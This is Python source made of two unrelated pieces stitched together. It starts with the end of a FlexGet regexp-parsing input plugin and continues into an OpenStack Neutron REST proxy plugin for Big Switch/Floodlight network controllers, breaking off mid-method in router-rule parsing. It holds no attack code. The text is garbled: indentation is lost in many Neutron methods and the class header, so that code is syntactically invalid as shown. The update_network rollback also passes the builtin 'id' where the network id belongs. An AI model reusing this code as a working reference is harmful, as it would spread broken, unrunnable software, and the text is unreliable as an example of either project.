        # 'title' is always required by flexget so declare it explicitly
        title = keys.accept('dict', key='title', required=True)
        title.accept('boolean', key='required')
        regexp_list = title.accept('list', key='regexps', required=True)
        regexp = regexp_list.accept('dict', required=True)
        regexp.accept('regexp', key='regexp', required=True)
        regexp.accept('text', key='flags')

        # 'url' is always required by flexget so declare it explicitly
        # NOTE(review): accept_any_key with an explicit key looks inconsistent
        # with the sibling 'title' (plain accept) -- confirm against the
        # flexget validator API
        url = keys.accept_any_key('dict', key='url', required=True)
        url.accept('boolean', key='required')
        regexp_list = url.accept('list', key='regexps', required=True)
        regexp = regexp_list.accept('dict', required=True)
        regexp.accept('regexp', key='regexp', required=True)
        regexp.accept('text', key='flags')

        # accept any other key the user wants to use
        key = keys.accept_any_key('dict')
        key.accept('boolean', key='required')
        regexp_list = key.accept('list', key='regexps', required=True)
        regexp = regexp_list.accept('dict', required=True)
        regexp.accept('regexp', key='regexp', required=True)
        regexp.accept('text', key='flags')
        return root

    def flagstr_to_flags(self, flag_str):
        """Turn a comma separated list of flag names into the combined int value.

        :raises KeyError: if a name is not listed in FLAG_VALUES
        """
        combined_flags = 0
        for flag in flag_str.split(','):
            combined_flags |= RegexpParse.FLAG_VALUES[flag.strip()]
        return combined_flags

    def compile_regexp_dict_list(self, re_list):
        """Turn a list of regexp config dicts into a list of compiled regexps."""
        compiled_regexps = []
        for dic in re_list:
            flags = self.flagstr_to_flags(dic['flags']) if 'flags' in dic else 0
            compiled_regexps.append(re.compile(dic['regexp'], flags))
        return compiled_regexps

    def isvalid(self, entry):
        """Check that all required fields are present in the entry."""
        for key in self.required:
            if key not in entry:
                return False
        return entry.isvalid()

    @cached('regexp_parse')
    @plugin.internet(log)
    def on_task_input(self, task, config):
        """Fetch the source, split it into sections and build entries."""
        url = config['source']

        # if it's a file open it and read into content (assume utf-8 encoding)
        if os.path.isfile(os.path.expanduser(url)):
            # use a context manager so the handle is closed deterministically
            # (it was previously leaked)
            with codecs.open(url, 'r', encoding='utf-8') as source_file:
                content = source_file.read()
        # else use requests to get the data
        else:
            content = task.requests.get(url).text

        sections = []
        seperators = config.get('sections')
        if seperators:
            for sep in seperators:
                flags = 0
                if 'flags' in sep:
                    flags = self.flagstr_to_flags(sep['flags'])
                sections.extend(re.findall(sep['regexp'], content, flags))
        # no seperators just do work on the whole content
        else:
            sections.append(content)

        # reset the required keys so repeated runs (or different tasks sharing
        # this instance) don't accumulate stale requirements
        self.required = []
        # holds all the regexps in a dict keyed by the field they fill
        key_to_regexps = {}
        for key, value in config['keys'].items():
            key_to_regexps[key] = self.compile_regexp_dict_list(value['regexps'])
            if 'required' in value and value['required']:
                self.required.append(key)

        entries = []
        for section in sections:
            entry = Entry()
            for key, regexps in key_to_regexps.items():
                for regexp in regexps:
                    m = regexp.search(section)
                    if m:
                        # first matching regexp wins for this key
                        entry[key] = m.group(0)
                        break
            if self.isvalid(entry):
                entries.append(entry)
        return entries
@event('plugin.register')
def register_plugin():
    """Register the regexp_parse input plugin with FlexGet."""
    plugin.register(RegexpParse, 'regexp_parse', api_ver=2)
|
|
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright 2012 Big Switch Networks, Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Mandeep Dhami, Big Switch Networks, Inc.
# @author: Sumit Naiksatam, sumitnaiksatam@gmail.com, Big Switch Networks, Inc.
"""
Neutron REST Proxy Plug-in for Big Switch and FloodLight Controllers.
NeutronRestProxy provides a generic neutron plugin that translates all plugin
function calls to equivalent authenticated REST calls to a set of redundant
external network controllers. It also keeps persistent store for all neutron
state to allow for re-sync of the external controller(s), if required.
The local state on the plugin also allows for local response and fast-fail
semantics where it can be determined based on the local persistent store.
Network controller specific code is decoupled from this plugin and expected
to reside on the controller itself (via the REST interface).
This allows for:
- independent authentication and redundancy schemes between neutron and the
network controller
- independent upgrade/development cycles between neutron and the controller
as it limits the proxy code upgrade requirement to neutron release cycle
and the controller specific code upgrade requirement to controller code
- ability to sync the controller with neutron for independent recovery/reset
External REST API used by proxy is the same API as defined for neutron (JSON
subset) with some additional parameters (gateway on network-create and macaddr
on port-attach) on an additional PUT to do a bulk dump of all persistent data.
"""
import base64
import copy
import httplib
import json
import os
import socket
from oslo.config import cfg
from neutron.api.rpc.agentnotifiers import dhcp_rpc_agent_api
from neutron.common import constants as const
from neutron.common import exceptions
from neutron.common import rpc as q_rpc
from neutron.common import topics
from neutron.common import utils
from neutron import context as qcontext
from neutron.db import api as db
from neutron.db import db_base_plugin_v2
from neutron.db import dhcp_rpc_base
from neutron.db import l3_db
from neutron.extensions import l3
from neutron.extensions import portbindings
from neutron.openstack.common import log as logging
from neutron.openstack.common import rpc
from neutron.plugins.bigswitch.db import porttracker_db
from neutron.plugins.bigswitch import routerrule_db
from neutron.plugins.bigswitch.version import version_string_with_vcs
LOG = logging.getLogger(__name__)

# Include the BigSwitch Extensions path in the api_extensions
EXTENSIONS_PATH = os.path.join(os.path.dirname(__file__), 'extensions')
if not cfg.CONF.api_extensions_path:
    cfg.CONF.set_override('api_extensions_path',
                          EXTENSIONS_PATH)

# REST proxy options, registered under the [RESTPROXY] config section
restproxy_opts = [
    cfg.StrOpt('servers', default='localhost:8800',
               help=_("A comma separated list of BigSwitch or Floodlight "
                      "servers and port numbers. The plugin proxies the "
                      "requests to the BigSwitch/Floodlight server, "
                      "which performs the networking configuration. Note that "
                      "only one server is needed per deployment, but you may "
                      "wish to deploy multiple servers to support failover.")),
    cfg.StrOpt('server_auth', default='username:password', secret=True,
               help=_("The username and password for authenticating against "
                      " the BigSwitch or Floodlight controller.")),
    cfg.BoolOpt('server_ssl', default=False,
                help=_("If True, Use SSL when connecting to the BigSwitch or "
                       "Floodlight controller.")),
    cfg.BoolOpt('sync_data', default=False,
                help=_("Sync data on connect")),
    cfg.IntOpt('server_timeout', default=10,
               help=_("Maximum number of seconds to wait for proxy request "
                      "to connect and complete.")),
    cfg.StrOpt('neutron_id', default='neutron-' + utils.get_hostname(),
               deprecated_name='quantum_id',
               help=_("User defined identifier for this Neutron deployment")),
    cfg.BoolOpt('add_meta_server_route', default=True,
                help=_("Flag to decide if a route to the metadata server "
                       "should be injected into the VM")),
]
cfg.CONF.register_opts(restproxy_opts, "RESTPROXY")

# Router-rule options, registered under the [ROUTER] config section
router_opts = [
    cfg.MultiStrOpt('tenant_default_router_rule', default=['*:any:any:permit'],
                    help=_("The default router rules installed in new tenant "
                           "routers. Repeat the config option for each rule. "
                           "Format is <tenant>:<source>:<destination>:<action>"
                           " Use an * to specify default for all tenants.")),
    cfg.IntOpt('max_router_rules', default=200,
               help=_("Maximum number of router rules")),
]
cfg.CONF.register_opts(router_opts, "ROUTER")

# Nova VIF options, registered under the [NOVA] config section
nova_opts = [
    cfg.StrOpt('vif_type', default='ovs',
               help=_("Virtual interface type to configure on "
                      "Nova compute nodes")),
]

# Each VIF Type can have a list of nova host IDs that are fixed to that type
for i in portbindings.VIF_TYPES:
    opt = cfg.ListOpt('node_override_vif_' + i, default=[],
                      help=_("Nova compute nodes to manually set VIF "
                             "type to %s") % i)
    nova_opts.append(opt)

# Add the vif types for reference later
nova_opts.append(cfg.ListOpt('vif_types', default=portbindings.VIF_TYPES))
cfg.CONF.register_opts(nova_opts, "NOVA")

# The following are used to invoke the API on the external controller;
# each %s is filled with tenant/network/port/router identifiers
NET_RESOURCE_PATH = "/tenants/%s/networks"
PORT_RESOURCE_PATH = "/tenants/%s/networks/%s/ports"
ROUTER_RESOURCE_PATH = "/tenants/%s/routers"
ROUTER_INTF_OP_PATH = "/tenants/%s/routers/%s/interfaces"
NETWORKS_PATH = "/tenants/%s/networks/%s"
PORTS_PATH = "/tenants/%s/networks/%s/ports/%s"
ATTACHMENT_PATH = "/tenants/%s/networks/%s/ports/%s/attachment"
ROUTERS_PATH = "/tenants/%s/routers/%s"
ROUTER_INTF_PATH = "/tenants/%s/routers/%s/interfaces/%s"

# HTTP status codes the proxy treats as success / failure
# (0 marks a connection-level failure, see ServerProxy.rest_call)
SUCCESS_CODES = range(200, 207)
FAILURE_CODES = [0, 301, 302, 303, 400, 401, 403, 404, 500, 501, 502, 503,
                 504, 505]

SYNTAX_ERROR_MESSAGE = 'Syntax error in server config file, aborting plugin'
BASE_URI = '/networkService/v1.1'
ORCHESTRATION_SERVICE_ID = 'Neutron v2.0'
# Well-known link-local address of the cloud metadata service
METADATA_SERVER_IP = '169.254.169.254'
class RemoteRestError(exceptions.NeutronException):
    """Raised when a REST call to the backend network controller fails."""

    def __init__(self, message):
        detail = "None" if message is None else message
        prefix = _("Error in REST call to remote network "
                   "controller")
        self.message = prefix + ": " + detail
        super(RemoteRestError, self).__init__()
class ServerProxy(object):
    """REST server proxy to a network controller."""

    def __init__(self, server, port, ssl, auth, neutron_id, timeout,
                 base_uri, name):
        # server/port identify one backend controller endpoint
        self.server = server
        self.port = port
        self.ssl = ssl
        self.base_uri = base_uri
        self.timeout = timeout
        self.name = name
        self.success_codes = SUCCESS_CODES
        self.auth = None
        self.neutron_id = neutron_id
        if auth:
            # 'user:password' credentials become an HTTP Basic auth header
            self.auth = 'Basic ' + base64.encodestring(auth).strip()

    @utils.synchronized('bsn-rest-call', external=True)
    def rest_call(self, action, resource, data, headers):
        """Issue a single REST request against this server.

        :param action: HTTP method ('GET', 'PUT', 'POST', 'DELETE')
        :param resource: resource path, appended to base_uri
        :param data: request payload, JSON-encoded before sending
        :param headers: optional dict of extra headers (mutated in place)
        :returns: tuple (status, reason, response-string, response-data);
                  (0, None, None, None) on connection-level failure
        """
        uri = self.base_uri + resource
        body = json.dumps(data)
        if not headers:
            headers = {}
        headers['Content-type'] = 'application/json'
        headers['Accept'] = 'application/json'
        headers['NeutronProxy-Agent'] = self.name
        headers['Instance-ID'] = self.neutron_id
        headers['Orchestration-Service-ID'] = ORCHESTRATION_SERVICE_ID
        if self.auth:
            headers['Authorization'] = self.auth
        LOG.debug(_("ServerProxy: server=%(server)s, port=%(port)d, "
                    "ssl=%(ssl)r, action=%(action)s"),
                  {'server': self.server, 'port': self.port, 'ssl': self.ssl,
                   'action': action})
        LOG.debug(_("ServerProxy: resource=%(resource)s, data=%(data)r, "
                    "headers=%(headers)r"),
                  {'resource': resource, 'data': data, 'headers': headers})
        conn = None
        if self.ssl:
            conn = httplib.HTTPSConnection(
                self.server, self.port, timeout=self.timeout)
            if conn is None:
                LOG.error(_('ServerProxy: Could not establish HTTPS '
                            'connection'))
                return 0, None, None, None
        else:
            conn = httplib.HTTPConnection(
                self.server, self.port, timeout=self.timeout)
            if conn is None:
                LOG.error(_('ServerProxy: Could not establish HTTP '
                            'connection'))
                return 0, None, None, None
        try:
            conn.request(action, uri, body, headers)
            response = conn.getresponse()
            respstr = response.read()
            respdata = respstr
            if response.status in self.success_codes:
                try:
                    # successful responses are decoded as JSON when possible
                    respdata = json.loads(respstr)
                except ValueError:
                    # response was not JSON, ignore the exception
                    pass
            ret = (response.status, response.reason, respstr, respdata)
        except (socket.timeout, socket.error) as e:
            LOG.error(_('ServerProxy: %(action)s failure, %(e)r'),
                      {'action': action, 'e': e})
            ret = 0, None, None, None
        conn.close()
        LOG.debug(_("ServerProxy: status=%(status)d, reason=%(reason)r, "
                    "ret=%(ret)s, data=%(data)r"), {'status': ret[0],
                                                    'reason': ret[1],
                                                    'ret': ret[2],
                                                    'data': ret[3]})
        return ret
class ServerPool(object):
    """Pool of ServerProxy instances with sticky failover.

    Calls go to the first server in the list; a failing server is rotated
    to the back so the next healthy one becomes primary.
    """

    def __init__(self, servers, ssl, auth, neutron_id, timeout=10,
                 base_uri='/quantum/v1.0', name='NeutronRestProxy'):
        self.base_uri = base_uri
        self.timeout = timeout
        self.name = name
        self.auth = auth
        self.ssl = ssl
        self.neutron_id = neutron_id
        self.servers = [self.server_proxy_for(*server_port)
                        for server_port in servers]

    def server_proxy_for(self, server, port):
        """Build a ServerProxy for one (host, port) pair."""
        return ServerProxy(server, port, self.ssl, self.auth, self.neutron_id,
                           self.timeout, self.base_uri, self.name)

    def server_failure(self, resp):
        """Define failure codes as required.

        Note: We assume 301-303 is a failure, and try the next server in
        the server pool.
        """
        return resp[0] in FAILURE_CODES

    def action_success(self, resp):
        """Defining success codes as required.

        Note: We assume any valid 2xx as being successful response.
        """
        return resp[0] in SUCCESS_CODES

    def rest_call(self, action, resource, data, headers):
        """Try the call on each server in turn until one succeeds."""
        unreachable = []
        while self.servers:
            current = self.servers[0]
            ret = current.rest_call(action, resource, data, headers)
            if self.server_failure(ret):
                LOG.error(_('ServerProxy: %(action)s failure for servers: '
                            '%(server)r'),
                          {'action': action,
                           'server': (current.server,
                                      current.port)})
                unreachable.append(self.servers.pop(0))
            else:
                # put the failed ones back at the end of the rotation
                self.servers.extend(unreachable)
                return ret
        # All servers failed, reset server list and try again next time
        LOG.error(_('ServerProxy: %(action)s failure for all servers: '
                    '%(server)r'),
                  {'action': action,
                   'server': tuple((s.server,
                                    s.port) for s in unreachable)})
        self.servers.extend(unreachable)
        return (0, None, None, None)

    def get(self, resource, data='', headers=None):
        return self.rest_call('GET', resource, data, headers)

    def put(self, resource, data, headers=None):
        return self.rest_call('PUT', resource, data, headers)

    def post(self, resource, data, headers=None):
        return self.rest_call('POST', resource, data, headers)

    def delete(self, resource, data='', headers=None):
        return self.rest_call('DELETE', resource, data, headers)
class RpcProxy(dhcp_rpc_base.DhcpRpcCallbackMixin):
    """Expose DHCP agent RPC callbacks on behalf of the REST proxy plugin."""

    # Version of the RPC API this callback handler implements
    RPC_API_VERSION = '1.0'

    def create_rpc_dispatcher(self):
        """Return a dispatcher routing incoming RPC messages to this object."""
        return q_rpc.PluginRpcDispatcher([self])
class NeutronRestProxyV2(db_base_plugin_v2.NeutronDbPluginV2,
routerrule_db.RouterRule_db_mixin):
supported_extension_aliases = ["router", "binding", "router_rules"]
    def __init__(self, server_timeout=None):
        """Initialize the plugin: DB, controller connections, DHCP RPC.

        :param server_timeout: optional override (seconds) for the
            RESTPROXY.server_timeout config option
        """
        LOG.info(_('NeutronRestProxy: Starting plugin. Version=%s'),
                 version_string_with_vcs())

        # init DB, proxy's persistent store defaults to in-memory sql-lite DB
        db.configure_db()

        # 'servers' is the list of network controller REST end-points
        # (used in order specified till one succeeds, and it is sticky
        # till next failure). Use 'server_auth' to encode api-key
        servers = cfg.CONF.RESTPROXY.servers
        server_auth = cfg.CONF.RESTPROXY.server_auth
        server_ssl = cfg.CONF.RESTPROXY.server_ssl
        sync_data = cfg.CONF.RESTPROXY.sync_data
        neutron_id = cfg.CONF.RESTPROXY.neutron_id
        self.add_meta_server_route = cfg.CONF.RESTPROXY.add_meta_server_route
        timeout = cfg.CONF.RESTPROXY.server_timeout
        if server_timeout is not None:
            timeout = server_timeout

        # validate config
        assert servers is not None, 'Servers not defined. Aborting plugin'
        servers = tuple(s.rsplit(':', 1) for s in servers.split(','))
        # NOTE(review): an entry without ':port' raises ValueError while
        # unpacking here, before the len() assert below can fire -- confirm
        # whether the assert is ever reachable for malformed input
        servers = tuple((server, int(port)) for server, port in servers)
        assert all(len(s) == 2 for s in servers), SYNTAX_ERROR_MESSAGE

        # init network ctrl connections
        self.servers = ServerPool(servers, server_ssl, server_auth, neutron_id,
                                  timeout, BASE_URI)

        # init dhcp support
        self.topic = topics.PLUGIN
        self.conn = rpc.create_connection(new=True)
        self.callbacks = RpcProxy()
        self.dispatcher = self.callbacks.create_rpc_dispatcher()
        self.conn.create_consumer(self.topic, self.dispatcher,
                                  fanout=False)
        # Consume from all consumers in a thread
        self.conn.consume_in_thread()

        if sync_data:
            # push the full local state to the controller on startup
            self._send_all_data()

        self._dhcp_agent_notifier = dhcp_rpc_agent_api.DhcpAgentNotifyAPI()
        LOG.debug(_("NeutronRestProxyV2: initialization done"))
    def create_network(self, context, network):
        """Create a network.

        Network represents an L2 network segment which can have a set of
        subnets and ports associated with it.

        :param context: neutron api request context
        :param network: dictionary describing the network

        :returns: a sequence of mappings with the following signature:
        {
            "id": UUID representing the network.
            "name": Human-readable name identifying the network.
            "tenant_id": Owner of network. NOTE: only admin user can specify
                         a tenant_id other than its own.
            "admin_state_up": Sets admin state of network.
                              if down, network does not forward packets.
            "status": Indicates whether network is currently operational
                      (values are "ACTIVE", "DOWN", "BUILD", and "ERROR")
            "subnets": Subnets associated with this network.
        }

        :raises: RemoteRestError
        """
        LOG.debug(_("NeutronRestProxyV2: create_network() called"))

        self._warn_on_state_status(network['network'])

        # Validate args
        tenant_id = self._get_tenant_id_for_create(context, network["network"])

        session = context.session
        with session.begin(subtransactions=True):
            # create network in DB
            new_net = super(NeutronRestProxyV2, self).create_network(context,
                                                                     network)
            self._process_l3_create(context, new_net, network['network'])
            # create network on the network controller
            try:
                resource = NET_RESOURCE_PATH % tenant_id
                mapped_network = self._get_mapped_network_with_subnets(new_net)
                data = {
                    "network": mapped_network
                }
                ret = self.servers.post(resource, data)
                if not self.servers.action_success(ret):
                    raise RemoteRestError(ret[2])
            except RemoteRestError as e:
                # controller rejected the network: roll back the DB record
                LOG.error(_("NeutronRestProxyV2:Unable to create remote "
                            "network: %s"), e.message)
                super(NeutronRestProxyV2, self).delete_network(context,
                                                               new_net['id'])
                raise
        # return created network
        return new_net
def update_network(self, context, net_id, network):
"""Updates the properties of a particular Virtual Network.
:param context: neutron api request context
:param net_id: uuid of the network to update
:param network: dictionary describing the updates
:returns: a sequence of mappings with the following signature:
{
"id": UUID representing the network.
"name": Human-readable name identifying the network.
"tenant_id": Owner of network. NOTE: only admin user can
specify a tenant_id other than its own.
"admin_state_up": Sets admin state of network.
if down, network does not forward packets.
"status": Indicates whether network is currently operational
(values are "ACTIVE", "DOWN", "BUILD", and "ERROR")
"subnets": Subnets associated with this network.
}
:raises: exceptions.NetworkNotFound
:raises: RemoteRestError
"""
LOG.debug(_("NeutronRestProxyV2.update_network() called"))
self._warn_on_state_status(network['network'])
session = context.session
with session.begin(subtransactions=True):
orig_net = super(NeutronRestProxyV2, self).get_network(context,
net_id)
new_net = super(NeutronRestProxyV2, self).update_network(context,
net_id,
network)
self._process_l3_update(context, new_net, network['network'])
# update network on network controller
try:
self._send_update_network(new_net)
except RemoteRestError as e:
LOG.error(_("NeutronRestProxyV2: Unable to update remote "
"network: %s"), e.message)
# reset network to original state
super(NeutronRestProxyV2, self).update_network(context, id,
orig_net)
raise
# return updated network
return new_net
def delete_network(self, context, net_id):
"""Delete a network.
:param context: neutron api request context
:param id: UUID representing the network to delete.
:returns: None
:raises: exceptions.NetworkInUse
:raises: exceptions.NetworkNotFound
:raises: RemoteRestError
"""
LOG.debug(_("NeutronRestProxyV2: delete_network() called"))
# Validate args
orig_net = super(NeutronRestProxyV2, self).get_network(context, net_id)
tenant_id = orig_net["tenant_id"]
filter = {'network_id': [net_id]}
ports = self.get_ports(context, filters=filter)
# check if there are any tenant owned ports in-use
auto_delete_port_owners = db_base_plugin_v2.AUTO_DELETE_PORT_OWNERS
only_auto_del = all(p['device_owner'] in auto_delete_port_owners
for p in ports)
if not only_auto_del:
raise exceptions.NetworkInUse(net_id=net_id)
# delete from network ctrl. Remote error on delete is ignored
try:
resource = NETWORKS_PATH % (tenant_id, net_id)
ret = self.servers.delete(resource)
if not self.servers.action_success(ret):
raise RemoteRestError(ret[2])
ret_val = super(NeutronRestProxyV2, self).delete_network(context,
net_id)
return ret_val
except RemoteRestError as e:
LOG.error(_("NeutronRestProxyV2: Unable to update remote "
"network: %s"), e.message)
raise
    def create_port(self, context, port):
        """Create a port, which is a connection point of a device
        (e.g., a VM NIC) to attach to a L2 Neutron network.

        :param context: neutron api request context
        :param port: dictionary describing the port

        :returns:
        {
            "id": uuid representing the port.
            "network_id": uuid of network.
            "tenant_id": tenant_id
            "mac_address": mac address to use on this port.
            "admin_state_up": Sets admin state of port. if down, port
                              does not forward packets.
            "status": indicates whether port is currently operational
                      (limit values to "ACTIVE", "DOWN", "BUILD", and "ERROR")
            "fixed_ips": list of subnet ID's and IP addresses to be used on
                         this port
            "device_id": identifies the device (e.g., virtual server) using
                         this port.
        }

        :raises: exceptions.NetworkNotFound
        :raises: exceptions.StateInvalid
        :raises: RemoteRestError
        """
        LOG.debug(_("NeutronRestProxyV2: create_port() called"))

        # Update DB; the port starts admin-down and is flipped up only after
        # the controller has accepted it (see the end of this method)
        port["port"]["admin_state_up"] = False
        if (portbindings.HOST_ID in port['port']
            and 'device_id' in port['port']):
            # NOTE(review): the second argument is the device_id -- confirm
            # against porttracker_db.put_port_hostid whether a port id is
            # expected here instead
            porttracker_db.put_port_hostid(context, port['port']['device_id'],
                                           port['port'][portbindings.HOST_ID])
        new_port = super(NeutronRestProxyV2, self).create_port(context, port)
        net = super(NeutronRestProxyV2,
                    self).get_network(context, new_port["network_id"])

        if self.add_meta_server_route:
            if new_port['device_owner'] == 'network:dhcp':
                destination = METADATA_SERVER_IP + '/32'
                self._add_host_route(context, destination, new_port)

        # create on network ctrl
        try:
            resource = PORT_RESOURCE_PATH % (net["tenant_id"], net["id"])
            mapped_port = self._map_state_and_status(new_port)
            data = {
                "port": mapped_port
            }
            ret = self.servers.post(resource, data)
            if not self.servers.action_success(ret):
                raise RemoteRestError(ret[2])

            # connect device to network, if present
            device_id = port["port"].get("device_id")
            if device_id:
                self._plug_interface(context,
                                     net["tenant_id"], net["id"],
                                     new_port["id"], device_id)
        except RemoteRestError as e:
            # controller rejected the port: roll back the DB record
            LOG.error(_("NeutronRestProxyV2: Unable to create remote port: "
                        "%s"), e.message)
            super(NeutronRestProxyV2, self).delete_port(context,
                                                        new_port["id"])
            raise

        # Set port state up and return that port
        port_update = {"port": {"admin_state_up": True}}
        new_port = super(NeutronRestProxyV2, self).update_port(context,
                                                               new_port["id"],
                                                               port_update)
        return self._extend_port_dict_binding(context, new_port)
def get_port(self, context, id, fields=None):
with context.session.begin(subtransactions=True):
port = super(NeutronRestProxyV2, self).get_port(context, id,
fields)
self._extend_port_dict_binding(context, port)
return self._fields(port, fields)
def get_ports(self, context, filters=None, fields=None):
with context.session.begin(subtransactions=True):
ports = super(NeutronRestProxyV2, self).get_ports(context, filters,
fields)
for port in ports:
self._extend_port_dict_binding(context, port)
return [self._fields(port, fields) for port in ports]
def update_port(self, context, port_id, port):
"""Update values of a port.
:param context: neutron api request context
:param id: UUID representing the port to update.
:param port: dictionary with keys indicating fields to update.
:returns: a mapping sequence with the following signature:
{
"id": uuid represeting the port.
"network_id": uuid of network.
"tenant_id": tenant_id
"mac_address": mac address to use on this port.
"admin_state_up": sets admin state of port. if down, port
does not forward packets.
"status": dicates whether port is currently operational
(limit values to "ACTIVE", "DOWN", "BUILD", and "ERROR")
"fixed_ips": list of subnet ID's and IP addresses to be used on
this port
"device_id": identifies the device (e.g., virtual server) using
this port.
}
:raises: exceptions.StateInvalid
:raises: exceptions.PortNotFound
:raises: RemoteRestError
"""
LOG.debug(_("NeutronRestProxyV2: update_port() called"))
self._warn_on_state_status(port['port'])
# Validate Args
orig_port = super(NeutronRestProxyV2, self).get_port(context, port_id)
# Update DB
new_port = super(NeutronRestProxyV2, self).update_port(context,
port_id, port)
if (portbindings.HOST_ID in port['port']
and 'device_id' in port['port']):
porttracker_db.put_port_hostid(context, port['port']['device_id'],
port['port'][portbindings.HOST_ID])
# update on networl ctrl
try:
resource = PORTS_PATH % (orig_port["tenant_id"],
orig_port["network_id"], port_id)
mapped_port = self._map_state_and_status(new_port)
data = {"port": mapped_port}
ret = self.servers.put(resource, data)
if not self.servers.action_success(ret):
raise RemoteRestError(ret[2])
if new_port.get("device_id") != orig_port.get("device_id"):
if orig_port.get("device_id"):
self._unplug_interface(context, orig_port["tenant_id"],
orig_port["network_id"],
orig_port["id"])
device_id = new_port.get("device_id")
if device_id:
self._plug_interface(context, new_port["tenant_id"],
new_port["network_id"],
new_port["id"], device_id)
except RemoteRestError as e:
LOG.error(_("NeutronRestProxyV2: Unable to create remote port: "
"%s"), e.message)
# reset port to original state
super(NeutronRestProxyV2, self).update_port(context, port_id,
orig_port)
raise
# return new_port
return self._extend_port_dict_binding(context, new_port)
    def delete_port(self, context, port_id, l3_port_check=True):
        """Delete a port.

        :param context: neutron api request context
        :param port_id: UUID representing the port to delete.

        :raises: exceptions.PortInUse
        :raises: exceptions.PortNotFound
        :raises: exceptions.NetworkNotFound
        :raises: RemoteRestError
        """
        LOG.debug(_("NeutronRestProxyV2: delete_port() called"))

        # if needed, check to see if this is a port owned by
        # an l3-router. If so, we should prevent deletion.
        if l3_port_check:
            self.prevent_l3_port_deletion(context, port_id)
        self.disassociate_floatingips(context, port_id)
        super(NeutronRestProxyV2, self).delete_port(context, port_id)
def _delete_port(self, context, port_id):
# Delete from DB
port = super(NeutronRestProxyV2, self).get_port(context, port_id)
tenant_id = port['tenant_id']
if tenant_id == '':
net = super(NeutronRestProxyV2,
self).get_network(context, port['network_id'])
tenant_id = net['tenant_id']
# delete from network ctrl. Remote error on delete is ignored
try:
resource = PORTS_PATH % (tenant_id, port["network_id"],
port_id)
ret = self.servers.delete(resource)
if not self.servers.action_success(ret):
raise RemoteRestError(ret[2])
if port.get("device_id"):
self._unplug_interface(context, tenant_id,
port["network_id"], port["id"])
ret_val = super(NeutronRestProxyV2, self)._delete_port(context,
port_id)
return ret_val
except RemoteRestError as e:
LOG.error(_("NeutronRestProxyV2: Unable to update remote port: "
"%s"), e.message)
raise
def _plug_interface(self, context, tenant_id, net_id, port_id,
remote_interface_id):
"""Plug remote interface to the network.
Attaches a remote interface to the specified port on the specified
Virtual Network.
:returns: None
:raises: exceptions.NetworkNotFound
:raises: exceptions.PortNotFound
:raises: RemoteRestError
"""
LOG.debug(_("NeutronRestProxyV2: _plug_interface() called"))
# update attachment on network controller
try:
port = super(NeutronRestProxyV2, self).get_port(context, port_id)
mac = port["mac_address"]
if mac is not None:
resource = ATTACHMENT_PATH % (tenant_id, net_id, port_id)
data = {"attachment":
{"id": remote_interface_id,
"mac": mac,
}
}
ret = self.servers.put(resource, data)
if not self.servers.action_success(ret):
raise RemoteRestError(ret[2])
except RemoteRestError as e:
LOG.error(_("NeutronRestProxyV2:Unable to update remote network: "
"%s"), e.message)
raise
def _unplug_interface(self, context, tenant_id, net_id, port_id):
"""Detach interface from the network controller.
Detaches a remote interface from the specified port on the network
controller.
:returns: None
:raises: RemoteRestError
"""
LOG.debug(_("NeutronRestProxyV2: _unplug_interface() called"))
# delete from network ctrl. Remote error on delete is ignored
try:
resource = ATTACHMENT_PATH % (tenant_id, net_id, port_id)
ret = self.servers.delete(resource)
if not self.servers.action_success(ret):
raise RemoteRestError(ret[2])
except RemoteRestError as e:
LOG.error(_("NeutronRestProxyV2: Unable to update remote port: "
"%s"), e.message)
def create_subnet(self, context, subnet):
LOG.debug(_("NeutronRestProxyV2: create_subnet() called"))
self._warn_on_state_status(subnet['subnet'])
# create subnet in DB
new_subnet = super(NeutronRestProxyV2, self).create_subnet(context,
subnet)
net_id = new_subnet['network_id']
orig_net = super(NeutronRestProxyV2, self).get_network(context,
net_id)
# update network on network controller
try:
self._send_update_network(orig_net)
except RemoteRestError:
# rollback creation of subnet
super(NeutronRestProxyV2, self).delete_subnet(context,
subnet['id'])
raise
return new_subnet
    def update_subnet(self, context, id, subnet):
        """Update a subnet in the DB and push the change to the backend.

        :param context: neutron api request context
        :param id: UUID of the subnet to update
        :param subnet: subnet request dict with the fields to change
        :returns: the updated subnet dict
        :raises: RemoteRestError if the backend update fails (a DB
            rollback to the previous subnet is attempted first)
        """
        LOG.debug(_("NeutronRestProxyV2: update_subnet() called"))
        self._warn_on_state_status(subnet['subnet'])
        # snapshot taken before the change, used for the rollback below
        orig_subnet = super(NeutronRestProxyV2, self)._get_subnet(context, id)
        # update subnet in DB
        new_subnet = super(NeutronRestProxyV2, self).update_subnet(context, id,
                                                                   subnet)
        net_id = new_subnet['network_id']
        orig_net = super(NeutronRestProxyV2, self).get_network(context,
                                                               net_id)
        # update network on network controller
        try:
            self._send_update_network(orig_net)
        except RemoteRestError:
            # rollback updation of subnet
            # NOTE(review): orig_subnet is the DB object returned by
            # _get_subnet, while update_subnet expects a {'subnet': ...}
            # request dict -- confirm this rollback path actually works.
            super(NeutronRestProxyV2, self).update_subnet(context, id,
                                                          orig_subnet)
            raise
        return new_subnet
    def delete_subnet(self, context, id):
        """Delete a subnet from the DB and resync its network.

        :param context: neutron api request context
        :param id: UUID of the subnet to delete
        :raises: RemoteRestError if the backend resync fails (the DB
            deletion is NOT rolled back -- see TODO below)
        """
        LOG.debug(_("NeutronRestProxyV2: delete_subnet() called"))
        # the network id must be read before the subnet row disappears
        orig_subnet = super(NeutronRestProxyV2, self).get_subnet(context, id)
        net_id = orig_subnet['network_id']
        # delete subnet in DB
        super(NeutronRestProxyV2, self).delete_subnet(context, id)
        orig_net = super(NeutronRestProxyV2, self).get_network(context,
                                                               net_id)
        # update network on network controller
        try:
            self._send_update_network(orig_net)
        except RemoteRestError:
            # TODO(Sumit): rollback deletion of subnet
            raise
def _get_tenant_default_router_rules(self, tenant):
rules = cfg.CONF.ROUTER.tenant_default_router_rule
defaultset = []
tenantset = []
for rule in rules:
items = rule.split(':')
if len(items) == 5:
(tenantid, source, destination, action, nexthops) = items
elif len(items) == 4:
(tenantid, source, destination, action) = items
nexthops = ''
else:
continue
parsedrule = {'source': source,
'destination': destination, 'action': action,
'nexthops': nexthops.split(',')}
